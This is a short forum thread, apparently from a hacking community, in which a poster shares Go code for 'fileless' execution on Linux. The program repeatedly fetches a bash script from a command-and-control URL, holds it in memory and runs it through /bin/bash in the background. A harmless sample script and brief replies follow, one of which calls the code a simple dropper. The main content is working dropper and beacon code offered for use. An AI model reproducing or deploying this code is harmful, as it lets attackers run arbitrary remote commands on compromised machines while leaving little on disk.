[GoLang] Executing fileless scripts

Hi folks!

Some days ago I was wondering some new ideia to code in Go, and I had this idea: Something similar to powershell “DownloadString” but for Linux environment!

Its very simple, the code read you shellscript body from your C&C, keep it in memory (within a variable), then execute directly in bash.
I didn’t test deeply, did some basic tests, and worked.

package main

import (
    "io/ioutil"
    "net/http"
    "os/exec"
    "time"
)

func main() {
    for {
        url := "http://my_command_control:8080/executeThisScript" // Download your bash script
        resp, _ := http.Get(string(url))
        defer resp.Body.Close()

        shellScriptBody, _ := ioutil.ReadAll(resp.Body) // keep in memory

        cmd := exec.Command("/bin/bash", "-c", string(shellScriptBody))
        cmd.Start()                                                     // run in background

        time.Sleep(5000) // wait for the next beacoming
    }
}

Example of dumb shell to PoC:

#!/bin/bash

if [ ! -d /tmp/testDir ]; then
mkdir /tmp/testDir
fi

cd /tmp/testDir
touch test.sh
ifconfig > ifconfig.log
4 Likes

Well, it’s quite similar to execute system command from “@system(‘cmd’)” in PHP. It fits for windows and linux os. :sweat_smile:

yeah, its just a way to execute it in Go.
Instead PHP, Go can be compiled in ELF file, PHP cant be compiled ELF.
But what I coded, can be done in PHP also.

I think it a simple dropper

I’ve been seeing more malware samples written in Go, this post is making me think I need to check it out!